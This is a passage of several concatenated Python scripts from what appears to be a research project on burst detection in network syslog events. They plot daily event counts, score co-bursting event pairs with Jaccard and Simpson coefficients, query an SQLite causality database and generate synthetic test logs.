    if DIRECTION == '1':
        title = ['Source','Destination']
    elif DIRECTION == '0':
        title = ['No Direction Detected','']
    else:
        title = ['','']
    # plot
    fig = plt.figure(figsize=(14,12))
    #default left : 0.125 right : 0.9 bottom : 0.1 top : 0.9 wspace : 0.2 hspace : 0.2
    fig.subplots_adjust(left=0.08,right=0.99, hspace=0.5, bottom=0.13, top=0.95)
    plot_cnt = 1
    for DUMP_NAME in [DUMP_NAME1,DUMP_NAME2]:
        obj = open_dump(get_dump_path(DUMP_NAME,DATE))
        plot_year = int(DATE[:4])
        plot_month = int(DATE[4:6])
        plot_day = int(DATE[6:8])
        plot_date = datetime.date(plot_year,plot_month,plot_day)
        plot_data = [row.time() for row in obj if row.date() == plot_date]
        plot_data_coll = collections.Counter(plot_data)
        x = [row.hour*3600 + row.minute*60 + row.second for row in sorted(set(plot_data))]
        y = [0]
        for row in sorted(plot_data_coll.items(),key=lambda z:z[0]):
            y.append(row[1]+y[-1])
        y = y[1:]
        # staircase transform
        x = np.sort(np.append(x,x))[1:]
        x = np.insert(x,0,x[0])
        tmp = []
        for row in y:
            tmp.append(row)
            tmp.append(row)
        y = tmp[:-1]
        y = [0] + y
        # pad the curve out to the whole day (00:00:00 .. 23:59:59)
        x = np.insert(x,0,0)
        x = np.append(x,86399)
        y = [0,] + y + [y[-1]]
        # plt.subplot(2,1,plot_cnt)
        ax = fig.add_subplot(2,1,plot_cnt)
        plt.plot(x, y)
        plt.xticks([i*3600 for i in range(25)],[str(i).zfill(2)+':00' for i in range(25)],rotation=90,fontsize=15)
        plt.xlabel('Time',fontsize=('20'))
        ax.xaxis.set_label_coords(0.5, -0.25)
        plt.yticks(fontsize=15)
        plt.ylabel('Cumulative Count',fontsize=('20'))
        plt.title(title[plot_cnt-1], fontsize=('20'))
        plt.xlim(0,86400)
        plt.grid()
        plot_cnt += 1
    plt.savefig(DUMP_NAME1.split('/')[-1].split('.')[0]+'-'+DUMP_NAME2.split('/')[-1].split('.')[0]+'_'+DATE+'.png')
if __name__ == '__main__':
    # CLI dispatch: choose the plot variant by argument count / trailing flag.
    if len(sys.argv) < 3:
        print('usage')
        print('Plot:\t\tpython plot_day.py event 20120101')
        print('For Paper plot:\tpython plot_day.py event 20120101 p')
        print('Double plot:\tpython plot_day.py event1 event2 20120101')
        exit()
    if len(sys.argv) == 4 and sys.argv[-1] == 'p':
        # for paper fig plot
        DUMP_NAME = sys.argv[1]
        DATE = sys.argv[2]
        plot_day_fp(DUMP_NAME, DATE)
    elif len(sys.argv) == 4 and sys.argv[-1] == 'old':
        DUMP_NAME = sys.argv[1]
        DATE = sys.argv[2]
        plot_day_old(DUMP_NAME, DATE)
    elif len(sys.argv) == 4:
        # two events + a date -> comparison plot
        DUMP_NAME1 = sys.argv[1]
        DUMP_NAME2 = sys.argv[2]
        DATE = sys.argv[3]
        plot_day_comp(DUMP_NAME1, DUMP_NAME2, DATE)
    elif len(sys.argv) == 5:
        # two events + date + direction flag -> paper comparison plot
        DUMP_NAME1 = sys.argv[1]
        DUMP_NAME2 = sys.argv[2]
        DATE = sys.argv[3]
        plot_day_comp_fp(DUMP_NAME1, DUMP_NAME2, DATE, sys.argv[4])
    else:
        DUMP_NAME = sys.argv[1]
        DATE = sys.argv[2]
        plot_day(DUMP_NAME, DATE)
--- FILE SEPARATOR ---
# Script: given srcID srcHost dstID dstHost on the command line, print (as
# YYYYMMDD) every date on which that event pair appears in the causality DB,
# in either direction.
import sqlite3
import sys
argv = sys.argv[1:]
conn = sqlite3.connect('s4causality.db')
cur = conn.cursor()
# SECURITY NOTE(review): the query is assembled with str.format - acceptable
# for trusted CLI input, but switch to parameter binding (?) if these values
# can ever come from an untrusted source.
query='select date from date where pairID in(select pairID from event where (srcID={0} and srcHost="{1}" and dstID={2} and dstHost="{3}") or (srcID={2} and srcHost="{3}" and dstID={0} and dstHost="{1}"));'.format(argv[0],argv[1],argv[2],argv[3])
cur.execute(query)
for i in cur.fetchall():
    # dates are stored as 'YYYY-MM-DD'; strip the dashes
    print("".join(i[0].split("-")))
# query='select * from event where (srcID={0} and srcHost="{1}" and dstID={2} and dstHost="{3}") or (srcID={2} and srcHost="{3}" and dstID={0} and dstHost="{1}");'.format(argv[0],argv[1],argv[2],argv[3])
#
# cur.execute(query)
#
# for i in cur.fetchall():
# print(i)
--- FILE SEPARATOR ---
# coding=utf-8
'''
search burst.py
'''
import collections
import datetime
import pickle
import numpy as np
import pandas as pd
import sys
import matplotlib
import matplotlib.pyplot as plt
# import seaborn as sns
def print_full(x):
    """Print the whole DataFrame *x*, temporarily disabling pandas truncation."""
    settings = {'display.max_rows': len(x), 'display.max_columns': len(x.columns)}
    for key, value in settings.items():
        pd.set_option(key, value)
    print(x)
    for key in settings:
        pd.reset_option(key)
def open_dump(dump_file):
    """Return the object pickled at *dump_file* (bytes-encoded pickle)."""
    source = open(dump_file, "rb")
    with source:
        return pickle.load(source, encoding="bytes")
def search_burst(burst_df):
    '''
    Find events whose bursts start within 60 seconds of each other.

    search_burst(pd.DataFrame burst_df)
    burst_df: days as index, events as columns; each cell is a list of burst
    tuples whose element [1] is the burst start time (or NaN).

    return co_burst_results = dict{
        key = key_event,
        value = Counter{key = co_event, value = cnt}
    }
    '''
    # NOTE(review): Series.iteritems() was removed in pandas 2.0 (use
    # items()); this code targets an older pandas.
    co_burst_results = collections.defaultdict(lambda: 0)
    for day_series in burst_df.iterrows():
        day_series = day_series[1].dropna()
        for cur_event, cur_values in day_series.iteritems():
            rel_event = []
            for cur in cur_values:
                cur_st = cur[1]
                for tar_event, tar_values in day_series.iteritems():
                    if tar_event == cur_event:
                        continue
                    for tar in tar_values:
                        tar_st = tar[1]
                        # co-burst if the starts are within +/-60 seconds
                        if cur_st - 60 < tar_st < cur_st + 60:
                            rel_event.append(tar_event)
                            break # count each related event at most once per cur burst
            # first day for this event: store a fresh Counter; later days
            # accumulate into it (the defaultdict default 0 marks "unset")
            if co_burst_results[cur_event] == 0:
                co_burst_results[cur_event] = collections.Counter(rel_event)
            else:
                print('ck')
                co_burst_results[cur_event] += collections.Counter(rel_event)
    return co_burst_results
def calc_jaccard(AandB, A, B):
    """Jaccard coefficient |A&B| / |A|B| from the three counts, clamped to
    at most 1.0.  Returns 1.0 when the union is empty."""
    union = A + B - AandB
    if union == 0:
        return 1.0
    return min(AandB / union, 1.)
def calc_simpson(AandB, A, B):
    """Simpson (overlap) coefficient |A&B| / min(|A|, |B|), clamped to <= 1.0.

    FIX: guard the empty-set case - min(A, B) == 0 used to raise
    ZeroDivisionError; return 1.0 for consistency with calc_jaccard's
    handling of an empty union.
    """
    smaller = min(A, B)
    if smaller == 0:
        return 1.0
    prb = AandB / smaller
    if prb > 1. :
        prb = 1.
    return prb
def calc_co_prob(host_bursts, cur_event, co_result):
    """Build a per-co-event table of similarity scores against *cur_event*.

    host_bursts: mapping event -> total burst count.
    co_result:   iterable of (co_event, co_count) pairs.
    Returns a DataFrame indexed by co_event with columns 'x' (the co-event's
    total burst count), 'y_jaccard' and 'y_simpson'.

    FIX: DataFrame.append() was removed in pandas 2.0; rows are collected in
    a list and built into the frame in one step (same result on old pandas).
    """
    cur_all = host_bursts[cur_event]
    rows = []
    for co_event, co_cnt in co_result:
        co_event_all = host_bursts[co_event]
        rows.append(pd.Series(
            {'x': host_bursts[co_event],
             'y_jaccard': calc_jaccard(co_cnt, cur_all, co_event_all),
             'y_simpson': calc_simpson(co_cnt, cur_all, co_event_all)},
            name=co_event))
    if not rows:
        return pd.DataFrame(columns=['x','y_jaccard','y_simpson'])
    return pd.DataFrame(rows, columns=['x','y_jaccard','y_simpson'])
def calc_co_prob_all(host_bursts, co_burst_results):
    """Score every unordered event pair exactly once.

    host_bursts:      mapping event -> total burst count.
    co_burst_results: mapping event -> Counter of co-bursting events.
    For each pair the larger of the two directional co-counts is used.
    Returns a DataFrame with columns EvPair, x (=|A|B|), y_jaccard, y_simpson.

    FIX: DataFrame.append(ignore_index=True) was removed in pandas 2.0; rows
    are collected in a list and built into the frame once at the end.
    """
    event_set = []
    rows = []
    for cur_event, co_result in co_burst_results.items():
        cur_all = host_bursts[cur_event]
        for co_event, co_cnt in co_result.items():
            if {cur_event, co_event} in event_set:
                continue  # pair already scored from the other direction
            # use the larger directional co-count for the pair
            if co_burst_results[co_event][cur_event] > co_cnt:
                co_cnt = co_burst_results[co_event][cur_event]
            event_set.append({cur_event, co_event})
            co_all = host_bursts[co_event]
            new_line = pd.Series({
                'EvPair': (cur_event, co_event),
                'x': co_all + cur_all - co_cnt,
                'y_jaccard': calc_jaccard(co_cnt, cur_all, co_all),
                'y_simpson': calc_simpson(co_cnt, cur_all, co_all),
            })
            # sanity check: scores are clamped, so > 1 signals bad counts
            if new_line['y_jaccard'] > 1 or new_line['y_simpson'] > 1:
                print(new_line, co_all, cur_all, co_cnt)
            rows.append(new_line)
    if not rows:
        return pd.DataFrame(columns=['EvPair', 'x', 'y_jaccard', 'y_simpson'])
    frame = pd.DataFrame(rows, columns=['EvPair', 'x', 'y_jaccard', 'y_simpson'])
    return frame.reset_index(drop=True)
def host_burst_cnt(burst_df):
    '''
    host_burst_cnt(pd.DataFrame burst_df)
    Total burst-interval count per event column: each non-null cell is a
    list of burst tuples, and its length is added to the event's total.
    returns = defaultdict{key=event, value=all_cnt}
    '''
    totals = collections.defaultdict(lambda: 0)
    for event in burst_df.columns:
        bursts = burst_df.loc[:, event].dropna()
        totals[event] = sum(len(entry) for entry in bursts)
    return totals
def co_plot(cur_event, co_prob_result):
    # Scatter plot of Jaccard score vs co-event size for one key event;
    # saves '<cur_event>_jaccard.png'.  Returns 0 (no plot) when empty.
    if len(co_prob_result) == 0 :
        return 0
    fig = plt.figure()
    plt.style.use('ggplot')
    # fig.subplots_adjust(left=0.03,right=0.995)
    # NOTE: scales the caller's DataFrame column IN PLACE by 1e5 so the log
    # axis can be relabelled 1..1e5 -> 1e-4..1.0; callers should not reuse
    # the column afterwards.
    co_prob_result['y_jaccard'] = co_prob_result['y_jaccard'] * (10 ** 5 )
    co_prob_result.plot(kind='scatter',x='x', y='y_jaccard', figsize=(9,9))
    plt.title(cur_event, fontsize='20')
    plt.xscale("log")
    plt.yscale("log")
    plt.xticks(fontsize='15')
    # plt.xlabel(fontsize='15')
    plt.yticks([10 ** i for i in range(1,6)],
               ['$1.0^{-4}$','$1.0^{-3}$','$1.0^{-2}$','$1.0^{-1}$','1.0'],
               fontsize='15')
    # plt.ylabel(fontsize='15')
    plt.ylim(1., 10. ** 5 + 10 ** 4)
    # NOTE(review): grid(b=...) was renamed to visible= in Matplotlib 3.6.
    plt.grid(b=True, which='major',lw='1', color='gray')
    plt.grid(b=True, which='minor', linestyle='--', color='white')
    plt.savefig('{0}_jaccard.png'.format(cur_event))
def co_plot_all(co_prob_result):
    # One scatter per similarity kind (jaccard, simpson): score vs pair size;
    # saves 'jaccard_all.png' and 'simpson_all.png'.  Returns 0 when empty.
    if len(co_prob_result) == 0 :
        return 0
    fig = plt.figure()
    plt.style.use('ggplot')
    # fig.subplots_adjust(left=0.03,right=0.995)
    plot_cnt = 1
    # co_prob_result.plot(subplots=True,layout=(1,3))
    fig, axes = plt.subplots(nrows=1,ncols=2)
    for kind in ['jaccard','simpson']:
        # plt.subplot(1,2,plot_cnt)
        # NOTE: mutates the caller's column in place (scaled by 1e5 for the
        # log-axis relabelling trick below).
        co_prob_result['y_{0}'.format(kind)] = co_prob_result['y_{0}'.format(kind)] * (10 ** 5 )
        # co_prob_result['y_simpson'] = co_prob_result['y_simpson'] * (10 ** 5 )
        co_prob_result.plot(kind='scatter',x='x', y='y_{0}'.format(kind), figsize=(9,9))
        # co_prob_result.plot(kind='scatter', figsize=(9,9), subplots= True, layout=(1,2), x='x', y ='y_jaccard')
        # plt.xscale("log")
        plt.yscale("log")
        plt.xticks(fontsize='15')
        plt.yticks([10 ** i for i in range(1,6)],
                   ['$1.0^{-4}$','$1.0^{-3}$','$1.0^{-2}$','$1.0^{-1}$','1.0'],
                   fontsize='15')
        # plt.yticks(fontsize='15')
        plt.ylim(1., 10. ** 5 + 10 ** 4)
        # plt.ylim(-1000, 10. ** 5 + 10 ** 4)
        # NOTE(review): grid(b=...) was renamed to visible= in Matplotlib 3.6.
        plt.grid(b=True, which='major',lw='1', color='gray')
        plt.grid(b=True, which='minor', linestyle='--', color='white')
        plot_cnt += 1
        plt.savefig('{0}_all.png'.format(kind))
def co_plot_all_fp(co_prob_result):
    # Paper-figure version of co_plot_all: one standalone EPS per kind
    # ('jaccard_nofilter.eps', 'simpson_nofilter.eps').  Returns 0 when empty.
    if len(co_prob_result) == 0 :
        return 0
    plot_cnt = 1
    for kind in ['jaccard','simpson']:
        fig = plt.figure(figsize=(10,6))
        ax = fig.add_subplot(111)
        fig.subplots_adjust(top=0.95, bottom=0.15, left=0.15)
        # NOTE: mutates the caller's column in place (scaled by 1e5 for the
        # log-axis relabelling below).
        co_prob_result['y_{0}'.format(kind)] = co_prob_result['y_{0}'.format(kind)] * (10 ** 5 )
        x=co_prob_result['x'].values
        y=co_prob_result['y_{0}'.format(kind)].values
        plt.scatter(x,y, marker='.', c=None)
        plt.yscale("log")
        plt.xticks(fontsize='18')
        plt.yticks([10 ** i for i in range(1,6)],
                   ['$1.0^{-4}$','$1.0^{-3}$','$1.0^{-2}$','$1.0^{-1}$','1.0'],
                   fontsize='25')
        plt.ylim(1., 10. ** 5 + 10 ** 4)
        plt.grid()
        plt.xlabel(r'$|A \cup B|$', fontsize='23')
        ax.xaxis.set_label_coords(0.5, -0.13)
        # first figure is Jaccard, second Simpson
        if plot_cnt==1:
            ax.set_ylabel(r'$J(A,B)$', fontsize='23')
        else:
            ax.set_ylabel(r'$S(A,B)$', fontsize='23')
        ax.yaxis.set_label_coords(-0.15, 0.5)
        plt.savefig('{0}_nofilter.eps'.format(kind))
        plot_cnt += 1
if __name__ == "__main__":
    if len(sys.argv) == 2:
        # full pipeline: burst DataFrame -> pair scores -> pickle + plots
        burst_df = open_dump(sys.argv[1])
        ind = burst_df.index
        host_bursts = host_burst_cnt(burst_df)
        co_burst_results = search_burst(burst_df)
        co_prob_result = calc_co_prob_all(host_bursts, co_burst_results)
        co_prob_result = co_prob_result.sort_values(by='y_jaccard', ascending=False)
        with open('co_prob_df','wb') as f:
            pickle.dump(co_prob_result,f)
        co_plot_all(co_prob_result)
        # print_full(co_prob_result.sort_values(by='b', ascending=False))
        exit()
        # NOTE(review): everything below is unreachable because of exit().
        for cur_event, co_result in co_burst_results.items():
            co_result = sorted(co_result.items(),
                               key=lambda x: x[1],
                               reverse=True)
            co_prob_result = calc_co_prob(host_bursts, cur_event, co_result)
            print('\nind:',cur_event,host_bursts[cur_event])
            print_full(co_prob_result)
            co_plot(cur_event,co_prob_result)
    else:
        # replot mode: NOTE(review) this reads sys.argv[2], so it needs at
        # least three CLI arguments even though the condition is len != 2.
        co_prob_result = open_dump(sys.argv[2])
        print_full(co_prob_result)
        co_plot_all(co_prob_result)
--- FILE SEPARATOR ---
import pickle
import datetime
import sys
import glob
import collections
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import math
# import search_burst as sb
def open_dump(dump_file):
    """Unpickle and return the contents of *dump_file*."""
    with open(dump_file,"rb") as f:
        obj = pickle.load(f, encoding="bytes")
    return obj

def get_ids(host, get_date):
    """Return (event_id, record_count) pairs for every dump of *host* on
    *get_date*, sorted by count in descending order.

    FIX: the original called sorted() and discarded its return value, so the
    list came back in arbitrary glob order; sort in place instead.
    """
    ids = []
    for path in glob.glob('dumps/{0}/*_{1}'.format(get_date, host)):
        ids.append((path.split("/")[-1].split("_")[0], len(open_dump(path))))
    ids.sort(key=lambda pair: pair[1], reverse=True)
    return ids
if __name__ == "__main__":
    # Keep only host-level bursts that do NOT overlap any per-device burst,
    # and pickle the survivors to 'host_burst_df'.
    get_dates = [i.split('/')[-1] for i in glob.glob('dumps_host/*')]
    colors = ['red','orange','y','lightgreen','green','lightblue','blue','purple','gray','black']
    bursts = open_dump('burst_df')
    dump_result = []
    # iterate over every date
    for get_date in get_dates:
        print(get_date)
        # iterate over every host seen on that date
        for host in [i.split('/')[-1].split('_')[-1] for i in glob.glob('dumps_host/{0}/*'.format(get_date))]:
            # all device IDs of this host on this date
            ids = get_ids(host,get_date)
            # proceed only if a host-level burst was detected on this date
            # (a detected result unpacks into exactly three elements)
            if len(open_dump('burst_result_host/{0}/{1}'.format(get_date,get_date+'_'+host)))==3:
                filename, filedatem, h_burst = open_dump('burst_result_host/{0}/{1}'.format(get_date,get_date+'_'+host))
                # (start, end) of each host-level burst
                h_st_ens = [(i[1],i[2]) for i in h_burst]
                # collect (start, end) of every per-device burst
                st_ens = []
                for id_,c in ids:
                    bs = bursts[str(id_)+'_'+host][get_date]
                    if type(bs) == list:
                        for b in bs:
                            st_ens.append((b[1],b[2]))
                # drop host bursts that overlap any device burst interval
                result = []
                for h_st,h_en in h_st_ens:
                    flag=0
                    for st,en in st_ens:
                        if h_st <= en and h_en >= st:# intervals overlap
                            flag=1
                            break
                    if flag == 0 :# no overlap -> keep this host burst
                        result.append((h_st,h_en))
                # record the surviving bursts for this (host, date)
                if result != []:
                    dump_result.append((host,get_date,result))
    # dump
    with open('host_burst_df','wb') as f:
        pickle.dump(dump_result,f)
--- FILE SEPARATOR ---
#!/usr/bin/python
import numpy as np
import pandas as pd
import datetime
import search_burst as sb
import plot_day
import pickle
import search_burst as sb
import sqlite3
import collections
'''
Determine whether the daily time profiles of a pair of events are similar in shape.
'''
def cnt_logs(DUMP_NAME, DATE):
    """Number of log records stored in dumps/<DATE>/<DUMP_NAME>."""
    records = sb.open_dump('dumps/' + str(DATE) + '/' + DUMP_NAME)
    return len(records)
def get_eday(evp):
    """Query the causality DB for every date on which the event pair *evp*
    (('srcID_srcHost', 'dstID_dstHost')) co-occurred, in either direction.

    Returns the dates as 'YYYYMMDD' strings.  Relies on the module-level
    cursor ``cur``.
    """
    argv = evp[0].split("_") + evp[1].split("_")
    query='select date from date where pairID in(select pairID from event where (srcID={0} and srcHost="{1}" and dstID={2} and dstHost="{3}") or (srcID={2} and srcHost="{3}" and dstID={0} and dstHost="{1}"));'.format(argv[0],argv[1],argv[2],argv[3])
    cur.execute(query)
    # dates come back as 'YYYY-MM-DD'; strip the dashes
    return ["".join(row[0].split("-")) for row in cur.fetchall()]
def get_log(DUMP_NAME, DATE):
    """Return the unpickled log records stored at dumps/<DATE>/<DUMP_NAME>."""
    return sb.open_dump('dumps/' + str(DATE) + '/' + DUMP_NAME)
def check_synm(evp, anddays):
    # Decide whether the two events of pair *evp* share the same per-minute
    # time profile on any day in *anddays*.
    # Returns (exact_any, normalised_any): the first compares raw per-minute
    # histograms, the second compares integer-percent histograms (shape
    # match even when absolute counts differ).
    res1 = []
    res2 = []
    for day in anddays:
        ev1 = get_log(evp[0],day)
        lev1 = len(ev1)
        ev2 = get_log(evp[1],day)
        lev2 = len(ev2)
        # per-minute ('HHMM') histograms of each event's records
        ev1 = collections.Counter([i.strftime('%H%M') for i in ev1])
        # lev1 = ev1.most_common(1)[0][1]
        ev2 = collections.Counter([i.strftime('%H%M') for i in ev2])
        # lev2 = ev2.most_common(1)[0][1]
        # histograms normalised to integer percentages of the day's total
        ev1s = {k:int(v/lev1*100) for k,v in ev1.items()}
        ev2s = {k:int(v/lev2*100) for k,v in ev2.items()}
        # print(ev1s);exit()
        # debug output for one specific pair of interest
        if evp[0] == '117_tokyo-dc-rm' and evp[1] == '116_tokyo-dc-rm':
            print(ev1,ev2)
            print(ev1s,ev2s)
        res1.append(ev1==ev2)
        res2.append(ev1s==ev2s)
    return any(res1),any(res2)
if __name__ == "__main__":
    # For every co-bursting event pair, find days where both events burst
    # AND the pair co-occurs in the causality DB, test shape similarity on
    # those days, and pickle the results.
    dbname = 's4causality.db'
    conn = sqlite3.connect(dbname)
    cur = conn.cursor()
    edge_burst = sb.open_dump('rp_edge_coburst')
    print(len(edge_burst))
    burst = sb.open_dump('burst_df')
    # events that burst at least once
    burst_ev = [x for x in burst.columns if len(burst[x].dropna()) != 0]
    result = []
    for evp in edge_burst['EvPair']:
        # burst days of each event of the pair as 'YYYYMMDD' strings
        bday1 = burst[evp[0]].dropna().index.values
        bday1 = [str(x).split('T')[0].replace("-","") for x in bday1]
        bday2 = burst[evp[1]].dropna().index.values
        bday2 = [str(x).split('T')[0].replace("-","") for x in bday2]
        # days on which BOTH events burst
        bday = list(set(bday1) & set(bday2))
        eday = get_eday(evp)
        # keep only days also present in the causality DB for this pair
        if len(set(bday) & set(eday)) != 0:
            anddays = list(set(bday) & set(eday))
            res1,res2 = check_synm(evp,anddays)
            result.append((evp,anddays,res1,res2))
    # print(result)
    with open('burst_burst_synm_min','wb') as f:
        pickle.dump(result,f)
    conn.close()
    exit()
--- FILE SEPARATOR ---
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import pickle
import sys
import datetime
import collections
# Script body: for each dump file named on the command line, print the first
# and last calendar day covered by its records.
values = []
dn_list = []
for dn in sys.argv[1:]:
    DUMP_NAME = dn
    dn_list.append(dn.split('/')[-1])
    with open(DUMP_NAME,"rb") as f:
        obj = pickle.load(f, encoding="bytes")
    # distinct days present in the dump, sorted ascending
    tmp = set( [datetime.datetime(row.year,row.month,row.day) for row in obj ] )
    x = sorted(list(tmp))
    print(dn,'\t',x[0],x[-1])
--- FILE SEPARATOR ---
#!/usr/bin/python
# coding: UTF-8
import sys
import sqlite3
import time
import re
import os.path
import tqdm
import random
import tqdm
'''
Synthetic test data generator:
24 hours, 30 - 1,500 records per group.
'''
# Characters that word_split() treats as stand-alone tokens.
PARSE_CHAR = ['(',')','[',']','=']
# Output SQLite database for the synthetic test data.
DBNAME = 'test.db'
#word split by space and parse char
def word_split(log):
    # Tokenise *log*: pad each PARSE_CHAR with spaces so it becomes its own
    # token, split on runs of spaces, and drop a trailing empty token.
    w = list(log)
    for (i,word) in enumerate(w):
        if word in PARSE_CHAR:
            w[i] = ' ' + w[i] + ' '
    w = ''.join(w)
    w = re.split(' +',w)
    if w[-1] == '':
        w = w[:-1]
    # NOTE(review): MSG_OFFSET is not defined anywhere in this file, so this
    # line raises NameError as written - presumably the message body starts
    # after a fixed-length header; confirm where MSG_OFFSET should come from.
    return w[MSG_OFFSET:]
#get format from db
#return: ft = [[group id, format]]
def get_ft():
    """Read the `format` table from the SQLite DB named by sys.argv[1].

    Returns a list of [group_id, stripped_format_string] pairs.
    """
    connection = sqlite3.connect(sys.argv[1])
    cursor = connection.cursor()
    cursor.execute("""select * from format""")
    rows = cursor.fetchall()
    connection.commit()
    connection.close()
    return [[row[0], row[1].strip()] for row in rows]
#compare format and log
#return: 0 -> match, other -> not match
def compare_f(log,fmt):
    """Count mismatching tokens between *log* and the format string *fmt*.

    Returns 0 on a full match.  '*' in the format matches any token; a
    token-count mismatch returns 1 immediately (cheap length check first).
    """
    log_words = word_split(log)
    fmt_words = fmt.split()
    if len(log_words) != len(fmt_words):
        return 1
    mismatches = 0
    for log_word, fmt_word in zip(log_words, fmt_words):
        if fmt_word != '*' and log_word != fmt_word:
            mismatches += 1
    return mismatches
#get time stamp(sec) from log
def get_time_sec(log):
    # Convert the 'HH:MM:SS' field of *log* to seconds since midnight.
    # NOTE(review): TIME_OFFSET is not defined in this file - the word index
    # of the timestamp presumably comes from a sibling script; confirm.
    time_stamp = log.split()[TIME_OFFSET].split(':')
    time_sec = int(time_stamp[0])*60*60+int(time_stamp[1])*60+int(time_stamp[2])
    return time_sec
def sec2time(sec):
    """Format *sec* (seconds since midnight) as a zero-padded 'HH:MM:SS' string."""
    hours, remainder = divmod(int(sec), 3600)
    minutes, seconds = divmod(remainder, 60)
    return '{0:02d}:{1:02d}:{2:02d}'.format(hours, minutes, seconds)
def insert_db(ind, msg, time_sec):
    """(Re)create table *ind* in DBNAME and fill it with one row per timestamp.

    Registers (ind, msg) in the `format` table, then inserts each value of
    *time_sec* (seconds since midnight) as a (time, log) row of table *ind*.

    FIX: values are now bound with ? placeholders instead of being formatted
    into the SQL text, so a message containing a quote can no longer break
    the statement (or inject SQL).  SQLite cannot parameterise identifiers,
    so the numeric *ind* is still formatted into the table name.
    """
    con = sqlite3.connect(DBNAME)
    cur = con.cursor()
    cur.execute("""drop table if exists '{0}' """.format(ind))
    cur.execute("""create table if not exists '{0}' (id integer primary key,time integer,log text)""".format(ind))
    cur.execute("""insert into format(id,f) values (?,?);""", (ind, msg))
    for time_stamp in time_sec:
        cur.execute("""insert into '{0}'(time,log) values (?,?);""".format(ind), (time_stamp, msg))
    con.commit()
    con.close()
if __name__ == '__main__':
    # initialize: recreate the shared `format` table (group id -> message text)
    con = sqlite3.connect(DBNAME)
    cur = con.cursor()
    cur.execute("""drop table if exists format """)
    cur.execute("""create table if not exists format(id integer,f text)""")
    con.commit()
    con.close()
    # group_log_list: {group id : log}
    # group_log_list = {k:[] for k in range(1,20)}
    ind = 1
    # pattern 1: a 5-minute burst of 1000 events at a random start-of-day offset
    start_time = random.randint(0,60*60*24 - 60*5)
    msg = 'Burst: 5min({0}-{1}) 1000cnt burst points'.format(sec2time(start_time),sec2time(start_time+60*5))
    time_sec = []
    for i in range(1000):
        time_sec.append(random.randint(start_time,start_time+60*5))
    time_sec = sorted(time_sec)
    insert_db(ind,msg,time_sec)
    ind += 1
'''
msg = 'Period: 5min period'
time_sec = [x * 60 * 5 for x in range( int( 60*60*24 / (60*5) ) ) ]
insert_db(ind,msg,time_sec)
ind += 1
msg = 'Period: 10min period'
time_sec = [x * 60 * 10 for x in range( int( 60*60*24 / (60*10) ) ) ]
insert_db(ind,msg,time_sec)
ind += 1
msg = 'Period: 15min period'
time_sec = [x * 60 * 15 for x in range( int( 60*60*24 / (60*15) ) ) ]
insert_db(ind,msg,time_sec)
ind += 1
msg = 'Period: 20min period'
time_sec = [x * 60 * 20 for x in range( int( 60*60*24 / (60*20) ) ) ]
insert_db(ind,msg,time_sec)
ind += 1
msg = 'Period: 30min period'
time_sec = [x * 60 * 30 for x in range( int( 60*60*24 / (60*30) ) ) ]
insert_db(ind,msg,time_sec)
ind += 1
msg = 'Period: 7min period'
time_sec = [x * 60 * 7 for x in range( int( 60*60*24 / (60*7) ) ) ]
insert_db(ind,msg,time_sec)
ind += 1
'''
# msg = 'Period: 5min period with some irregular point'
# time_sec = [x * 60 * 60 for x in range( int( 60*60*24 / (60*60) ) ) ]
# # for i in range(30):
# # time_sec[random.randint(0,len(time_sec)-1)] += 2
# insert_db(ind,msg,time_sec)
# ind += 1
'''
msg = 'Period: 30min period with some irregular point'
time_sec = [x * 60 * 30 for x in range( int( 60*60*24 / (60*30) ) ) ]
for i in range(5):
time_sec[random.randint(0,len(time_sec)-1)] += 2
insert_db(ind,msg,time_sec)
ind += 1
msg = 'Period: 60min period with some irregular point'
time_sec = [x * 60 * 60 for x in range( int( 60*60*24 / (60*60) ) ) ]
for i in range(3):
time_sec[random.randint(0,len(time_sec)-1)] += 2
insert_db(ind,msg,time_sec)
ind += 1
start_time = random.randint(0,60*60*24 - 60*5)
msg = 'Burst: 5min({0}-{1}) 1000cnt burst points'.format(sec2time(start_time),sec2time(start_time+60*5))
time_sec = []
for i in range(1000):
time_sec.append(random.randint(start_time,start_time+60*5))
time_sec = sorted(time_sec)
insert_db(ind,msg,time_sec)
ind += 1
start_time = random.randint(0,60*60*24 - 60*10)
change_time = start_time + int(60*8)
msg = 'Burst: 10min({0}-{1}) 1000cnt burst points with trend change {2}'.format(sec2time(start_time),sec2time(start_time+60*10),sec2time(change_time))
time_sec = []
for i in range(1000):
time_sec.append(random.randint(start_time,change_time))
for i in range(4000):
time_sec.append(random.randint(change_time,start_time+60*10))
time_sec = sorted(time_sec)
insert_db(ind,msg,time_sec)
ind += 1
start_time = random.randint(0,60*60*24 - 60*10)
msg = 'Random: 10 / 1h'
time_sec = []
for i in range(24):
for j in range(10):
time_sec.append(random.randint(i*60*60,(i+1)*60*60))
time_sec = sorted(time_sec)
insert_db(ind,msg,time_sec)
ind += 1
start_time = random.randint(0,60*60*24 - 60*5)
msg = 'Period Burst: 10min period with one burst point 5min({0}-{1})'.format(sec2time(start_time),sec2time(start_time+60*5))
time_sec = [x * 60 * 10 for x in range( int( 60*60*24 / (60*10) ) ) ]
for i in range(1000):
time_sec.append(random.randint(start_time,start_time+60*5))
time_sec = sorted(time_sec)
insert_db(ind,msg,time_sec)
ind += 1
start_time1 = random.randint(0,60*60*24 - 60*5)
start_time2 = random.randint(0,60*60*24 - 60*5)
start_time3 = random.randint(0,60*60*24 - 60*5)
msg = 'Period Burst: 10min period with 3 burst points 5min({0}-{1},{2}-{3},{4}-{5})'.format(sec2time(start_time1),sec2time(start_time1+60*5),sec2time(start_time2),sec2time(start_time2+60*5),sec2time(start_time3),sec2time(start_time3+60*5))
time_sec = [x * 60 * 10 for x in range( int( 60*60*24 / (60*10) ) ) ]
for i in range(1000):
time_sec.append(random.randint(start_time1,start_time1+60*5))
time_sec.append(random.randint(start_time2,start_time2+60*5))
time_sec.append(random.randint(start_time3,start_time3+60*5))
time_sec = sorted(time_sec)
insert_db(ind,msg,time_sec)
ind += 1
start_time = random.randint(0,60*60)
msg = 'Period Burst: 10min period with 30min period burst points 5min({0}-{1})'.format(sec2time(start_time1),sec2time(start_time1+60*5))
time_sec = [x * 60 * 10 for x in range( int( 60*60*24 / (60*10) ) ) ]
for _ in range(int((60*60*24-start_time)/(60*30))):
for i in range(1000):
time_sec.append(random.randint(start_time,start_time+60*5))
start_time += 60*30
time_sec = sorted(time_sec)
insert_db(ind,msg,time_sec)
ind += 1
'''
#
# while(ind<10):
# start_time1 = random.randint(0,60*60*24 - 60*10)
